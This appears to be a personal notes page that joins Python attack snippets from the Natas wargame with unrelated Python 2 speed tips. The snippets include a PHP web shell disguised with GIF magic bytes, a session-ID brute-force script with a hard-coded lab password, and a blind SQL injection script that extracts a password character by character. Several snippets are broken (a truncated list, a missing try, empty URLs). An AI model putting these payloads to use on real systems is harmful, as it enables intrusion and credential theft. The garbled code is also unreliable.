Python basics

Add magic numbers to the beginning of the file

fh = open('magic_numbers_gif.php','w')  
fh.write('\x47\x49\x46\x38' + '<?php passthru($_GET["cmd"]); ?>')  # GIF8<?php passthru($_GET["cmd"]); ?>


import requests
from requests.auth import HTTPBasicAuth

for x in range(1, 640):
    sessionid = str(str(x) + "-admin").encode("hex")
    print "Trying: " + sessionid + ": "+str(x)
    r = requests.get("", auth=HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'), cookies={"PHPSESSID":str(sessionid)})
    print r
    if "You are an admin." in r.text:
        print "FOUND: " + str(x)
    print r.text

Brute force attack

import urllib
import urllib2

url = ''
referrer = ''
authorization = 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='

Chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r',

password = ""

#loop through possible length of password
for i in range(1, 33):
    print "%d out of 32" % (i)
    #loop through possible chars
    for j in range(0,len(Chars)):
        sqli = 'natas16" AND LEFT(password, %d) COLLATE latin1_general_cs = "%s' % (i,password + Chars[j])
        values = {'username' : sqli}
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        req.add_header('Cookie', cookie)
        req.add_header('Referrer', referrer)
        req.add_header('Authorization', authorization)
            response = urllib2.urlopen(req)
            the_page =
            #print the_page
        except HTTPError, e:
            print e.reason
        if "This user exists." in the_page:
            print password

Optimize for speed


Membership testing O(1)

Use dictionary or set instead of list or tuple.
Searching sequences have O(n)

a in b

String concatenation – join()

Use .join() which has O(n)
+ or += are O(n ** 2)


Iterator form over list form

– xrange
– itertools.imap
– generator expressions
– dict.iteritems

List forms
– range
– -map
– – list comprehensions
– dict.items

Iterator forms are more memory friendly and more scalable.

builtin datatypes, extension modules and builtin functions

Use builtin assets whenever possible as the are optimized.


Custom sort ordering is best performed with Py2.4’s key= option or with the traditional decorate-sort-undecorate technique. Both approaches call the key function just once per element. In contrast, sort’s cmp= option is called many times per element during a sort. For example, sort(key=str.lower) is faster than sort(cmp=lambda a,b: cmp(a.lower(), b.lower())).

Local variables

Local variables are accessed more quickly than global variables, builtins and attribute lookups.

List comprehensions

List comprehensions run a bit faster than equivalent for-loops.

while 1 / while True

Interpreter optimizes “while 1” to just a single jump. In contrast “while True” takes several more steps. While the latter is preferred for clarity, time-critical code should use the first form.

Multiple assignments

Multiple assignment is slower than individual assignment. For example “x,y=a,b” is slower than “x=a; y=b”. However, multiple assignment is faster for variable swaps. For example, “x,y=y,x” is faster than “t=x; x=y; y=t”.

Chained comparisons

Chained comparisons are faster than using the “and” operator.
Write “x < y < z” instead of “x < y and y < z”.

Diagnostic tools